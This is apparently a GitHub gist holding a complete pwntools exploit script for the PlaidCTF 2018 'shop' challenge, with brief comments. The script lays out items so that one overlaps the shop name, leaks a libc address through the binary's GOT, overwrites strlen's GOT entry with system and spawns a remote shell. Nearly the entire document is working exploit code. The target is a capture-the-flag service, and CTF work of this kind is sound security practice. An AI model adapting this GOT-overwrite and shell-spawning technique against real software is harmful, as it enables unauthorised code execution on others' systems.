@DuckLL
Created May 7, 2018 08:08
PlaidCTF 2018 shop
from pwn import *
from time import sleep
# Connection setup for the remote challenge service.
HOST = 'shop.chal.pwning.xxx'
PORT = 9916

context.arch = 'amd64'  # 64-bit target: sets the width used by flat()/u64() below
elf = ELF('./shop')  # the challenge binary; its GOT entries are read further down
libc = ELF('./libc.so.6')  # the libc that ships with the challenge
# Local alternatives the author kept for testing:
#   io = process('./shop', env={'LD_PRELOAD': './libc.so.6'})
#   io = remote('localhost', 4000)
io = remote(HOST, PORT)
def menu(i):
    """Wait for the service's '>' prompt, then send *i* followed by a newline."""
    prompt = '>'
    io.sendlineafter(prompt, i)
def add(now):
    """Pick menu option 'a' and answer its three follow-up prompts with str(now)."""
    menu('a')
    answer = str(now)
    for _ in range(3):
        io.sendline(answer)
def check():
    """Pick menu option 'c', send a 0x10000-byte hex-alphabet cyclic pattern, then wait 1s.

    The one-second pause gives the service time to consume the large input
    before the next menu interaction is sent.
    """
    menu('c')
    pattern = cyclic(0x10000, alphabet="0123456789abcdef", n=4)
    io.sendline(pattern)
    sleep(1)
def ls():
    """Pick menu option 'l' (list); the caller reads the output itself."""
    menu('l')
def name(name):
    """Pick menu option 'n' and send *name* as its input (presumably the shop name).

    The parameter intentionally shadows the function name; callers pass it
    positionally, so it is kept for compatibility.
    """
    menu('n')
    io.sendline(name)
# --- exploit flow; the steps are order-dependent, each answer feeds the next ---
# Answer the startup ':' prompt (the shop name).
io.sendlineafter(':','deadbeef')
# Create 33 items (indices 0..32).
for i in xrange(33):
    add(i)
# item[32] will overlap shop name (author's note on the layout)
check()
# Set the shop name so that item[32]->fd becomes got['stdout'] - 12; the
# trailing 'uccu' is deliberately outside [0-9a-f] (see the note before the
# second check() below).
name(flat(elf.got['stdout']-12)+'uccu')
# List items: the output line read through the overwritten fd carries the leak.
ls()
# Take the second-to-last output line, keep its first 6 bytes and zero-extend
# to the 8 bytes u64() expects.
leak=u64(io.recvrepeat(1).split('\n')[-2][:6]+'\x00\x00')
# Alternative parse kept by the author (3 leaked bytes, upper bytes fixed):
# leak=u64(io.recvrepeat(1).split('\n')[-2][:3]+'\x00\x40\x00\x00\x00')
# Derive libc base from the leaked _IO_2_1_stdout_ address.
libc.address=leak-libc.symbols['_IO_2_1_stdout_']
log.info("libc@{}".format(hex(libc.address)))
io.sendline('')
# because uccu not in [0-9a-f]{4} item[32]=item[32]->fd (leak-12)
check()
# input from leak-12 to shop_name (to be got['strlen']-3)
name('A'*12+flat(libc.symbols['_IO_2_1_stdout_'],0,libc.symbols['_IO_2_1_stdin_'],0)+32*flat(0)+flat(elf.got['strlen']-3))
# strlen(buffer) -> system('sh')
name('sh\x00'+flat(libc.symbols['system']))
# getshell!
io.interactive()